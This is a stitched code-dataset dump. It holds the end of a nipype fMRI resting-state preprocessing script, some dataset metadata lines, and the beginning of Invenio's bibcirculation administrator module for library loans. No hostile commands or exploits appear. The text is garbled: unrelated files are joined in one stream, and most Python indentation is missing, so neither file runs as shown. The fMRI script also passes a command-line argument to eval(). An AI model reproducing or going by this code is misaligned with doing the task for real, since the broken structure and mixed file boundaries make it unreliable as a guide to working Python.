samplerlh.inputs.smooth_surf = surf_fwhm
# samplerlh.inputs.cortex_mask = True
samplerlh.inputs.out_type = 'niigz'
samplerlh.inputs.subjects_dir = subjects_dir
samplerrh = samplerlh.clone('sampler_rh')
samplerlh.inputs.hemi = 'lh'
wf.connect(collector, 'out', samplerlh, 'source_file')
wf.connect(registration, 'outputspec.out_reg_file', samplerlh, 'reg_file')
wf.connect(target, 'target_subject', samplerlh, 'target_subject')
samplerrh.set_input('hemi', 'rh')
wf.connect(collector, 'out', samplerrh, 'source_file')
wf.connect(registration, 'outputspec.out_reg_file', samplerrh, 'reg_file')
wf.connect(target, 'target_subject', samplerrh, 'target_subject')
# Combine left and right hemisphere to text file
combiner = MapNode(Function(input_names=['left', 'right'],
output_names=['out_file'],
function=combine_hemi,
imports=imports),
iterfield=['left', 'right'],
name="combiner")
wf.connect(samplerlh, 'out_file', combiner, 'left')
wf.connect(samplerrh, 'out_file', combiner, 'right')
# Sample the time series file for each subcortical roi
ts2txt = MapNode(Function(input_names=['timeseries_file', 'label_file',
'indices'],
output_names=['out_file'],
function=extract_subrois,
imports=imports),
iterfield=['timeseries_file'],
name='getsubcortts')
ts2txt.inputs.indices = [8] + list(range(10, 14)) + [17, 18, 26, 47] +\
list(range(49, 55)) + [58]
ts2txt.inputs.label_file = \
os.path.abspath(('OASIS-TRT-20_jointfusion_DKT31_CMA_labels_in_MNI152_'
'2mm_v2.nii.gz'))
wf.connect(maskts, 'out_file', ts2txt, 'timeseries_file')
######
substitutions = [('_target_subject_', ''),
('_filtermotart_cleaned_bp_trans_masked', ''),
('_filtermotart_cleaned_bp', '')
]
regex_subs = [('_ts_masker.*/sar', '/smooth/'),
('_ts_masker.*/ar', '/unsmooth/'),
('_combiner.*/sar', '/smooth/'),
('_combiner.*/ar', '/unsmooth/'),
('_aparc_ts.*/sar', '/smooth/'),
('_aparc_ts.*/ar', '/unsmooth/'),
('_getsubcortts.*/sar', '/smooth/'),
('_getsubcortts.*/ar', '/unsmooth/'),
('series/sar', 'series/smooth/'),
('series/ar', 'series/unsmooth/'),
('_inverse_transform./', ''),
]
# Save the relevant data into an output directory
datasink = Node(interface=DataSink(), name="datasink")
datasink.inputs.base_directory = sink_directory
datasink.inputs.container = subject_id
datasink.inputs.substitutions = substitutions
datasink.inputs.regexp_substitutions = regex_subs # (r'(/_.*(\d+/))', r'/run\2')
wf.connect(realign, 'realignment_parameters', datasink, 'resting.qa.motion')
wf.connect(art, 'norm_files', datasink, 'resting.qa.art.@norm')
wf.connect(art, 'intensity_files', datasink, 'resting.qa.art.@intensity')
wf.connect(art, 'outlier_files', datasink, 'resting.qa.art.@outlier_files')
wf.connect(registration, 'outputspec.segmentation_files', datasink, 'resting.mask_files')
wf.connect(registration, 'outputspec.anat2target', datasink, 'resting.qa.ants')
wf.connect(mask, 'mask_file', datasink, 'resting.mask_files.@brainmask')
wf.connect(mask_target, 'out_file', datasink, 'resting.mask_files.target')
wf.connect(filter1, 'out_f', datasink, 'resting.qa.compmaps.@mc_F')
wf.connect(filter1, 'out_pf', datasink, 'resting.qa.compmaps.@mc_pF')
wf.connect(filter2, 'out_f', datasink, 'resting.qa.compmaps')
wf.connect(filter2, 'out_pf', datasink, 'resting.qa.compmaps.@p')
wf.connect(bandpass, 'out_files', datasink, 'resting.timeseries.@bandpassed')
wf.connect(smooth, 'smoothed_files', datasink, 'resting.timeseries.@smoothed')
wf.connect(createfilter1, 'out_files',
datasink, 'resting.regress.@regressors')
wf.connect(createfilter2, 'out_files',
datasink, 'resting.regress.@compcorr')
wf.connect(maskts, 'out_file', datasink, 'resting.timeseries.target')
wf.connect(sampleaparc, 'summary_file',
datasink, 'resting.parcellations.aparc')
wf.connect(sampleaparc, 'avgwf_txt_file',
datasink, 'resting.parcellations.aparc.@avgwf')
wf.connect(ts2txt, 'out_file',
datasink, 'resting.parcellations.grayo.@subcortical')
datasink2 = Node(interface=DataSink(), name="datasink2")
datasink2.inputs.base_directory = sink_directory
datasink2.inputs.container = subject_id
datasink2.inputs.substitutions = substitutions
datasink2.inputs.regexp_substitutions = regex_subs # (r'(/_.*(\d+/))', r'/run\2')
wf.connect(combiner, 'out_file',
datasink2, 'resting.parcellations.grayo.@surface')
return wf
"""
Creates the full workflow including getting information from dicom files
"""
def create_resting_workflow(args, name=None):
TR = args.TR
slice_times = args.slice_times
if args.dicom_file:
TR, slice_times, slice_thickness = get_info(args.dicom_file)
slice_times = (np.array(slice_times) / 1000.).tolist()
if name is None:
name = 'resting_' + args.subject_id
kwargs = dict(files=[os.path.abspath(filename) for filename in args.files],
target_file=os.path.abspath(args.target_file),
subject_id=args.subject_id,
TR=TR,
slice_times=slice_times,
vol_fwhm=args.vol_fwhm,
surf_fwhm=args.surf_fwhm,
norm_threshold=2.,
subjects_dir=os.path.abspath(args.fsdir),
target_subject=args.target_surfs,
lowpass_freq=args.lowpass_freq,
highpass_freq=args.highpass_freq,
sink_directory=os.path.abspath(args.sink),
name=name)
wf = create_workflow(**kwargs)
return wf
if __name__ == "__main__":
from argparse import ArgumentParser, RawTextHelpFormatter
defstr = ' (default %(default)s)'
parser = ArgumentParser(description=__doc__,
formatter_class=RawTextHelpFormatter)
parser.add_argument("-d", "--dicom_file", dest="dicom_file",
help="an example dicom file from the resting series")
parser.add_argument("-f", "--files", dest="files", nargs="+",
help="4d nifti files for resting state",
required=True)
parser.add_argument("-t", "--target", dest="target_file",
help=("Target in MNI space. Best to use the MindBoggle "
"template - "
"OASIS-30_Atropos_template_in_MNI152_2mm.nii.gz"),
required=True)
parser.add_argument("-s", "--subject_id", dest="subject_id",
help="FreeSurfer subject id", required=True)
parser.add_argument("--subjects_dir", dest="fsdir",
help="FreeSurfer subject directory", required=True)
parser.add_argument("--target_surfaces", dest="target_surfs", nargs="+",
default=['fsaverage5'],
help="FreeSurfer target surfaces" + defstr)
parser.add_argument("--TR", dest="TR", default=None, type=float,
help="TR if dicom not provided in seconds")
parser.add_argument("--slice_times", dest="slice_times", nargs="+",
type=float, help="Slice onset times in seconds")
    parser.add_argument('--vol_fwhm', default=6., dest='vol_fwhm',
                        type=float, help="Volume smoothing FWHM in mm" + defstr)
    parser.add_argument('--surf_fwhm', default=15., dest='surf_fwhm',
                        type=float, help="Surface smoothing FWHM in mm" + defstr)
parser.add_argument("-l", "--lowpass_freq", dest="lowpass_freq",
default=0.1, type=float,
help="Low pass frequency (Hz)" + defstr)
parser.add_argument("-u", "--highpass_freq", dest="highpass_freq",
default=0.01, type=float,
help="High pass frequency (Hz)" + defstr)
parser.add_argument("-o", "--output_dir", dest="sink",
help="Output directory base", required=True)
parser.add_argument("-w", "--work_dir", dest="work_dir",
help="Output directory base")
parser.add_argument("-p", "--plugin", dest="plugin",
default='Linear',
help="Plugin to use")
parser.add_argument("--plugin_args", dest="plugin_args",
help="Plugin arguments")
args = parser.parse_args()
wf = create_resting_workflow(args)
if args.work_dir:
work_dir = os.path.abspath(args.work_dir)
else:
work_dir = os.getcwd()
wf.base_dir = work_dir
if args.plugin_args:
wf.run(args.plugin, plugin_args=eval(args.plugin_args))
else:
wf.run(args.plugin)
|
bsd-3-clause
| -405,855,577,794,183,200
| 40.41561
| 139
| 0.594639
| false
| 3.692997
| false
| false
| false
|
lnielsen/invenio
|
invenio/legacy/bibcirculation/adminlib.py
|
1
|
240137
|
## Administrator interface for Bibcirculation
##
## This file is part of Invenio.
## Copyright (C) 2008, 2009, 2010, 2011, 2012, 2013, 2014 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
## """Invenio Bibcirculation Administrator Interface."""
from __future__ import division
"""
Invenio Bibcirculation Administrator.
The functions are positioned by grouping into logical
categories('User Pages', 'Loans, Returns and Loan requests',
'ILLs', 'Libraries', 'Vendors' ...)
These orders should be maintained and when necessary, improved
for readability, as and when additional methods are added.
When applicable, methods should be renamed, refactored and
appropriate documentation added.
"""
__revision__ = "$Id$"
__lastupdated__ = """$Date$"""
import datetime
import time
import types
# Other Invenio imports
from invenio.config import \
CFG_SITE_LANG, \
CFG_SITE_URL, \
CFG_SITE_SECURE_URL, \
CFG_CERN_SITE
import invenio.modules.access.engine as acce
from invenio.legacy.webpage import page
from invenio.legacy.webuser import getUid, page_not_authorized
from invenio.legacy.webstat.api import register_customevent
from invenio.ext.logging import register_exception
from invenio.ext.email import send_email
from invenio.legacy.search_engine import perform_request_search, record_exists
from invenio.utils.url import create_html_link, create_url, redirect_to_url
from invenio.base.i18n import gettext_set_language
from invenio.config import \
CFG_BIBCIRCULATION_ITEM_STATUS_ON_LOAN, \
CFG_BIBCIRCULATION_ITEM_STATUS_ON_ORDER, \
CFG_BIBCIRCULATION_ITEM_STATUS_ON_SHELF, \
CFG_BIBCIRCULATION_ITEM_STATUS_IN_PROCESS, \
CFG_BIBCIRCULATION_ITEM_STATUS_UNDER_REVIEW, \
CFG_BIBCIRCULATION_LOAN_STATUS_ON_LOAN, \
CFG_BIBCIRCULATION_LOAN_STATUS_RETURNED, \
CFG_BIBCIRCULATION_REQUEST_STATUS_WAITING, \
CFG_BIBCIRCULATION_REQUEST_STATUS_PENDING, \
CFG_BIBCIRCULATION_REQUEST_STATUS_DONE, \
CFG_BIBCIRCULATION_REQUEST_STATUS_CANCELLED, \
CFG_BIBCIRCULATION_ILL_STATUS_NEW, \
CFG_BIBCIRCULATION_ILL_STATUS_ON_LOAN, \
CFG_BIBCIRCULATION_LIBRARY_TYPE_MAIN, \
CFG_BIBCIRCULATION_ACQ_STATUS_NEW, \
CFG_BIBCIRCULATION_ACQ_STATUS_RECEIVED, \
CFG_BIBCIRCULATION_PROPOSAL_STATUS_ON_ORDER, \
CFG_BIBCIRCULATION_PROPOSAL_STATUS_PUT_ASIDE, \
CFG_BIBCIRCULATION_PROPOSAL_STATUS_RECEIVED
# Bibcirculation imports
from invenio.legacy.bibcirculation.config import \
CFG_BIBCIRCULATION_TEMPLATES, CFG_BIBCIRCULATION_LIBRARIAN_EMAIL, \
CFG_BIBCIRCULATION_LOANS_EMAIL, CFG_BIBCIRCULATION_ILLS_EMAIL, \
CFG_BIBCIRCULATION_PROPOSAL_TYPE, CFG_BIBCIRCULATION_ACQ_STATUS
from invenio.legacy.bibcirculation.utils import book_title_from_MARC, \
update_status_if_expired, \
renew_loan_for_X_days, \
print_pending_hold_requests_information, \
print_new_loan_information, \
validate_date_format, \
generate_email_body, \
book_information_from_MARC, \
search_user, \
tag_all_requests_as_done, \
update_user_info_from_ldap, \
update_request_data, \
update_requests_statuses, \
has_date_format, \
generate_tmp_barcode, \
looks_like_dictionary
import invenio.legacy.bibcirculation.db_layer as db
import invenio.legacy.template
bc_templates = invenio.legacy.template.load('bibcirculation')
def is_adminuser(req):
"""check if user is a registered administrator. """
return acce.acc_authorize_action(req, "runbibcirculation")
def mustloginpage(req, message):
"""show a page asking the user to login."""
navtrail_previous_links = '<a class="navtrail" href="%s/admin/">' \
'Admin Area</a> > ' \
'<a class="navtrail" href="%s/admin/bibcirculation/">' \
'BibCirculation Admin</a> ' % (CFG_SITE_SECURE_URL, CFG_SITE_SECURE_URL)
return page_not_authorized(req=req, text=message,
navtrail=navtrail_previous_links)
def load_template(template):
"""
Load a letter/notification template from
bibcirculation_config.py.
@type template: string.
@param template: template that will be used.
    @return: template (string)
"""
if template == "overdue_letter":
output = CFG_BIBCIRCULATION_TEMPLATES['OVERDUE']
elif template == "reminder":
output = CFG_BIBCIRCULATION_TEMPLATES['REMINDER']
elif template == "notification":
output = CFG_BIBCIRCULATION_TEMPLATES['NOTIFICATION']
elif template == "ill_received":
output = CFG_BIBCIRCULATION_TEMPLATES['ILL_RECEIVED']
elif template == "ill_recall1":
output = CFG_BIBCIRCULATION_TEMPLATES['ILL_RECALL1']
elif template == "ill_recall2":
output = CFG_BIBCIRCULATION_TEMPLATES['ILL_RECALL2']
elif template == "ill_recall3":
output = CFG_BIBCIRCULATION_TEMPLATES['ILL_RECALL3']
elif template == "claim_return":
output = CFG_BIBCIRCULATION_TEMPLATES['SEND_RECALL']
elif template == "proposal_notification":
output = CFG_BIBCIRCULATION_TEMPLATES['PROPOSAL_NOTIFICATION']
elif template == "proposal_acceptance":
output = CFG_BIBCIRCULATION_TEMPLATES['PROPOSAL_ACCEPTANCE_NOTIFICATION']
elif template == "proposal_refusal":
output = CFG_BIBCIRCULATION_TEMPLATES['PROPOSAL_REFUSAL_NOTIFICATION']
elif template == "purchase_notification":
output = CFG_BIBCIRCULATION_TEMPLATES['PURCHASE_NOTIFICATION']
elif template == "purchase_received_tid":
output = CFG_BIBCIRCULATION_TEMPLATES['PURCHASE_RECEIVED_TID']
elif template == "purchase_received_cash":
output = CFG_BIBCIRCULATION_TEMPLATES['PURCHASE_RECEIVED_CASH']
else:
output = CFG_BIBCIRCULATION_TEMPLATES['EMPTY']
return output
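# A minimal, functionally equivalent sketch of the lookup above using a
# mapping instead of the if/elif chain. The keys mirror the entries already
# used in CFG_BIBCIRCULATION_TEMPLATES; 'EMPTY' remains the fallback. It is
# illustrative only and is not used by the handlers below.
_TEMPLATE_KEYS = {
    "overdue_letter": 'OVERDUE',
    "reminder": 'REMINDER',
    "notification": 'NOTIFICATION',
    "ill_received": 'ILL_RECEIVED',
    "ill_recall1": 'ILL_RECALL1',
    "ill_recall2": 'ILL_RECALL2',
    "ill_recall3": 'ILL_RECALL3',
    "claim_return": 'SEND_RECALL',
    "proposal_notification": 'PROPOSAL_NOTIFICATION',
    "proposal_acceptance": 'PROPOSAL_ACCEPTANCE_NOTIFICATION',
    "proposal_refusal": 'PROPOSAL_REFUSAL_NOTIFICATION',
    "purchase_notification": 'PURCHASE_NOTIFICATION',
    "purchase_received_tid": 'PURCHASE_RECEIVED_TID',
    "purchase_received_cash": 'PURCHASE_RECEIVED_CASH',
}
def _load_template_via_mapping(template):
    return CFG_BIBCIRCULATION_TEMPLATES[_TEMPLATE_KEYS.get(template, 'EMPTY')]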
def index(req, ln=CFG_SITE_LANG):
"""
    Main function to show pages for the BibCirculation admin.
"""
navtrail_previous_links = '<a class="navtrail"' \
' href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
body = bc_templates.tmpl_index(ln=ln)
return page(title=_("BibCirculation Admin"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
###
### Loans, Loan Requests, Loan Returns related templates.
###
def loan_on_desk_step1(req, key, string, ln=CFG_SITE_LANG):
"""
Step 1/4 of loan procedure.
Search a user/borrower and return a list with all the possible results.
@type key: string.
@param key: attribute that will be considered during the search. Can be 'name',
'email' or 'ccid/id'.
@type string: string.
@param string: keyword used during the search.
@return: list of potential borrowers.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
infos = []
_ = gettext_set_language(ln)
if key and not string:
infos.append(_('Empty string. Please, try again.'))
body = bc_templates.tmpl_loan_on_desk_step1(result=None, key=key,
string=string, infos=infos,
ln=ln)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
return page(title=_("Loan on desk"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
result = search_user(key, string)
borrowers_list = []
if len(result) == 0 and key:
if CFG_CERN_SITE:
infos.append(_("0 borrowers found.") + ' ' +_("Search by CCID."))
else:
new_borrower_link = create_html_link(CFG_SITE_SECURE_URL +
'/admin2/bibcirculation/add_new_borrower_step1',
{'ln': ln}, _("Register new borrower."))
message = _("0 borrowers found.") + ' ' + new_borrower_link
infos.append(message)
elif len(result) == 1:
return loan_on_desk_step2(req, result[0][0], ln)
else:
for user in result:
borrower_data = db.get_borrower_data_by_id(user[0])
borrowers_list.append(borrower_data)
body = bc_templates.tmpl_loan_on_desk_step1(result=borrowers_list,
key=key,
string=string,
infos=infos,
ln=ln)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
return page(title=_("Circulation management"),
uid=id_user,
req=req,
body=body,
language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def loan_on_desk_step2(req, user_id, ln=CFG_SITE_LANG):
"""
Step 2/4 of loan procedure.
Display the user/borrower's information.
@type user_id: integer
@param user_id: identify the borrower. It is also the primary key of
the table crcBORROWER.
"""
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
_ = gettext_set_language(ln)
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
infos = []
body = bc_templates.tmpl_loan_on_desk_step2(user_id=user_id,
infos=infos,
ln=ln)
return page(title=_("Circulation management"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def loan_on_desk_step3(req, user_id, list_of_barcodes, ln=CFG_SITE_LANG):
"""
Step 3/4 of loan procedure.
    Checks that the barcodes exist and that there are no requests on these records.
Lets the librarian change the due dates and add notes.
@type user_id: integer
@param user_id: identify the borrower. It is also the primary key of
the table crcBORROWER.
@type list_of_barcodes: list
@param list_of_barcodes: list of strings with the barcodes
introduced by the librarian with the barcode reader
"""
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
_ = gettext_set_language(ln)
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
infos = []
list_of_books = []
# to avoid duplicates
aux = []
for bc in list_of_barcodes:
if bc not in aux:
aux.append(bc)
list_of_barcodes = aux
for value in list_of_barcodes:
recid = db.get_id_bibrec(value)
loan_id = db.is_item_on_loan(value)
item_description = db.get_item_description(value)
if recid is None:
infos.append(_('%(x_strong_tag_open)s%(x_barcode)s%(x_strong_tag_close)s Unknown barcode.') % {'x_barcode': value, 'x_strong_tag_open': '<strong>', 'x_strong_tag_close': '</strong>'} + ' ' + _('Please, try again.'))
body = bc_templates.tmpl_loan_on_desk_step2(user_id=user_id,
infos=infos,
ln=ln)
elif loan_id:
            infos.append(_('The item with the barcode %(x_strong_tag_open)s%(x_barcode)s%(x_strong_tag_close)s is on a loan. Cannot be checked out.') % {'x_barcode': value, 'x_strong_tag_open': '<strong>', 'x_strong_tag_close': '</strong>'})
body = bc_templates.tmpl_loan_on_desk_step2(user_id=user_id,
infos=infos,
ln=ln)
elif user_id is None:
infos.append(_('You must select one borrower.'))
body = bc_templates.tmpl_loan_on_desk_step1(result=None,
key='',
string='',
infos=infos,
ln=ln)
else:
queue = db.get_queue_request(recid, item_description)
(library_id, location) = db.get_lib_location(value)
tup = (recid, value, library_id, location)
list_of_books.append(tup)
book_details = db.get_item_info(value)
item_status = book_details[7]
if item_status != CFG_BIBCIRCULATION_ITEM_STATUS_ON_SHELF:
message = _("%(x_strong_tag_open)sWARNING:%(x_strong_tag_close)s Note that item %(x_strong_tag_open)s%(x_barcode)s%(x_strong_tag_close)s status is %(x_strong_tag_open)s%(x_status)s%(x_strong_tag_close)s") % {'x_barcode': value, 'x_strong_tag_open': '<strong>', 'x_strong_tag_close': '</strong>', 'x_status': item_status}
infos.append(message)
if CFG_CERN_SITE:
library_type = db.get_library_type(library_id)
if library_type != CFG_BIBCIRCULATION_LIBRARY_TYPE_MAIN:
library_name = db.get_library_name(library_id)
message = _("%(x_strong_tag_open)sWARNING:%(x_strong_tag_close)s Note that item %(x_strong_tag_open)s%(x_barcode)s%(x_strong_tag_close)s location is %(x_strong_tag_open)s%(x_location)s%(x_strong_tag_close)s") % {'x_barcode': value, 'x_strong_tag_open': '<strong>', 'x_strong_tag_close': '</strong>', 'x_location': library_name}
infos.append(message)
if len(queue) != 0 and queue[0][0] != user_id:
message = _("Another user is waiting for the book: %(x_strong_tag_open)s%(x_title)s%(x_strong_tag_close)s. \n\n If you want continue with this loan choose %(x_strong_tag_open)s[Continue]%(x_strong_tag_close)s.") % {'x_title': book_title_from_MARC(recid), 'x_strong_tag_open': '<strong>', 'x_strong_tag_close': '</strong>'}
infos.append(message)
body = bc_templates.tmpl_loan_on_desk_step3(user_id=user_id,
list_of_books=list_of_books,
infos=infos, ln=ln)
if list_of_barcodes == []:
infos.append(_('Empty barcode.') + ' ' + _('Please, try again.'))
body = bc_templates.tmpl_loan_on_desk_step2(user_id=user_id,
infos=infos,
ln=ln)
if infos == []:
# shortcut to simplify loan process
due_dates = []
for bc in list_of_barcodes:
due_dates.append(renew_loan_for_X_days(bc))
return loan_on_desk_step4(req, list_of_barcodes, user_id,
due_dates, None, ln)
else:
return page(title=_("Circulation management"),
uid=id_user,
req=req,
body=body,
metaheaderadd = "<link rel=\"stylesheet\" href=\"%s/vendors/jquery-ui/themes/redmond/jquery-ui.min.css\" type=\"text/css\" />" % CFG_SITE_SECURE_URL,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def loan_on_desk_step4(req, list_of_barcodes, user_id,
due_date, note, ln=CFG_SITE_LANG):
"""
Step 4/4 of loan procedure.
Checks that items are not on loan and that the format of
the dates is correct and creates the loans
@type user_id: integer
@param user_id: identify the borrower. It is also the primary key of
the table crcBORROWER.
@type list_of_barcodes: list
@param list_of_barcodes: list of strings with the barcodes
introduced by the librarian with the barcode reader
@type due_date: list.
@param due_date: list of due dates.
@type note: string.
@param note: note about the new loan.
@return: page with the list 'Last Loans'
"""
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
_ = gettext_set_language(ln)
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
infos = []
#loaned_on = datetime.date.today()
#Check if one of the given items is on loan.
on_loan = []
for barcode in list_of_barcodes:
is_on_loan = db.is_item_on_loan(barcode)
if is_on_loan:
on_loan.append(barcode)
if len(on_loan) != 0:
message = _("The items with barcode %(x_strong_tag_open)s%(x_barcode)s%(x_strong_tag_close)s are already on loan.") % {'x_barcode': on_loan, 'x_strong_tag_open': '<strong>', 'x_strong_tag_close': '</strong>'}
infos.append(message)
body = bc_templates.tmpl_loan_on_desk_step1(result=None, key='',
string='', infos=infos,
ln=ln)
return page(title=_("Loan on desk"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
    # validate the due dates given by the admin
for date in due_date:
if validate_date_format(date) is False:
infos = []
message = _("The given due date %(x_strong_tag_open)s%(x_date)s%(x_strong_tag_close)s is not a valid date or date format") % {'x_date': date, 'x_strong_tag_open': '<strong>', 'x_strong_tag_close': '</strong>'}
infos.append(message)
list_of_books = []
for bc in list_of_barcodes:
recid = db.get_id_bibrec(bc)
(library_id, location) = db.get_lib_location(bc)
tup = (recid, bc, library_id, location)
list_of_books.append(tup)
body = bc_templates.tmpl_loan_on_desk_step3(user_id=user_id,
list_of_books=list_of_books,
infos=infos, ln=ln)
return page(title=_("Circulation management"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
#if borrower_id == None:
# db.new_borrower(ccid, name, email, phone, address, mailbox, '')
# borrower_id = db.get_borrower_id_by_email(email)
for i in range(len(list_of_barcodes)):
note_format = {}
if note:
note_format[time.strftime("%Y-%m-%d %H:%M:%S")] = str(note)
barcode = list_of_barcodes[i]
recid = db.get_id_bibrec(barcode)
db.new_loan(user_id, recid, barcode, due_date[i],
CFG_BIBCIRCULATION_LOAN_STATUS_ON_LOAN,
'normal', note_format)
        # Duplicate requests on items belonging to a single record have been disabled.
db.tag_requests_as_done(user_id, barcode)
# tag_all_requests_as_done(barcode, user_id)
db.update_item_status(CFG_BIBCIRCULATION_ITEM_STATUS_ON_LOAN, barcode)
update_requests_statuses(barcode)
infos.append(_("A loan for the item %(x_strong_tag_open)s%(x_title)s%(x_strong_tag_close)s, with barcode %(x_strong_tag_open)s%(x_barcode)s%(x_strong_tag_close)s, has been registered with success.") % {'x_title': book_title_from_MARC(recid), 'x_barcode': barcode, 'x_strong_tag_open': '<strong>', 'x_strong_tag_close': '</strong>'})
infos.append(_("You could enter the barcode for this user's next loan, if any."))
body = bc_templates.tmpl_loan_on_desk_step2(user_id=user_id,
infos=infos, ln=ln)
return page(title=_("Circulation management"),
uid=id_user,
req=req,
body=body,
metaheaderadd = "<link rel=\"stylesheet\" href=\"%s/vendors/jquery-ui/themes/redmond/jquery-ui.min.css\" type=\"text/css\" />" % CFG_SITE_SECURE_URL,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def loan_on_desk_confirm(req, barcode=None, borrower_id=None, ln=CFG_SITE_LANG):
"""
    *** Obsolete and unmaintained function ***
Confirm the return of an item.
@type barcode: string.
@param barcode: identify the item. It is the primary key of the table
crcITEM.
@type borrower_id: integer.
@param borrower_id: identify the borrower. It is also the primary key of
the table crcBORROWER.
"""
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
result = db.loan_on_desk_confirm(barcode, borrower_id)
body = bc_templates.tmpl_loan_on_desk_confirm(result=result,
barcode=barcode,
borrower_id=borrower_id,
ln=ln)
return page(title=_("Loan on desk confirm"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def register_new_loan(req, barcode, borrower_id,
request_id, new_note, print_data, ln=CFG_SITE_LANG):
"""
Register a new loan. This function is from the "Create Loan" pages.
@type barcode: string.
@param barcode: identify the item. It is the primary key of the table
crcITEM.
@type borrower_id: integer.
@param borrower_id: identify the borrower. It is also the primary key of
the table crcBORROWER.
@type request_id: integer.
@param request_id: identify the hold request. It is also the primary key
of the table crcLOANREQUEST.
@type new_note: string.
@param new_note: associate a note to this loan.
@type print_data: string.
@param print_data: print the information about this loan.
@return: new loan
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
has_recid = db.get_id_bibrec(barcode)
loan_id = db.is_item_on_loan(barcode)
recid = db.get_request_recid(request_id)
req_barcode = db.get_requested_barcode(request_id)
req_description = db.get_item_description(req_barcode)
# Get all the items belonging to the record whose
# description is the same.
list_of_barcodes = db.get_barcodes(recid, req_description)
infos = []
if print_data == 'true':
return print_new_loan_information(req, ln)
else:
if has_recid is None:
message = _('%(x_strong_tag_open)s%(x_barcode)s%(x_strong_tag_close)s Unknown barcode.') % {'x_barcode': barcode, 'x_strong_tag_open': '<strong>', 'x_strong_tag_close': '</strong>'} + ' ' + _('Please, try again.')
infos.append(message)
borrower = db.get_borrower_details(borrower_id)
title = _("Create Loan")
body = bc_templates.tmpl_create_loan(request_id=request_id,
recid=recid,
borrower=borrower,
infos=infos,
ln=ln)
elif loan_id:
infos.append(_('The item with the barcode %(x_strong_tag_open)s%(x_barcode)s%(x_strong_tag_close)s is on loan.') % {'x_barcode': barcode, 'x_strong_tag_open': '<strong>', 'x_strong_tag_close': '</strong>'})
borrower = db.get_borrower_details(borrower_id)
title = _("Create Loan")
body = bc_templates.tmpl_create_loan(request_id=request_id,
recid=recid,
borrower=borrower,
infos=infos,
ln=ln)
elif barcode not in list_of_barcodes:
            infos.append(_('The given barcode "%(x_barcode)s" does not correspond to the requested item.') % {'x_barcode': barcode})
borrower = db.get_borrower_details(borrower_id)
title = _("Create Loan")
body = bc_templates.tmpl_create_loan(request_id=request_id,
recid=recid,
borrower=borrower,
infos=infos,
ln=ln)
else:
recid = db.get_id_bibrec(barcode)
#loaned_on = datetime.date.today()
due_date = renew_loan_for_X_days(barcode)
if new_note:
note_format = '[' + time.ctime() + '] ' + new_note + '\n'
else:
note_format = ''
last_id = db.new_loan(borrower_id, recid, barcode,
due_date, CFG_BIBCIRCULATION_LOAN_STATUS_ON_LOAN,
'normal', note_format)
# register event in webstat
try:
register_customevent("loanrequest", [request_id, last_id])
            except Exception:
register_exception(suffix="Do the webstat tables exists? Try with 'webstatadmin --load-config'")
tag_all_requests_as_done(barcode, borrower_id)
db.update_item_status(CFG_BIBCIRCULATION_ITEM_STATUS_ON_LOAN, barcode)
db.update_loan_request_status(CFG_BIBCIRCULATION_REQUEST_STATUS_DONE,
request_id)
db.update_request_barcode(barcode, request_id)
update_requests_statuses(barcode)
result = db.get_all_loans(20)
infos.append(_('A new loan has been registered with success.'))
title = _("Current loans")
body = bc_templates.tmpl_all_loans(result=result,
infos=infos,
ln=ln)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
return page(title=title,
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def create_loan(req, request_id, recid, borrower_id, ln=CFG_SITE_LANG):
"""
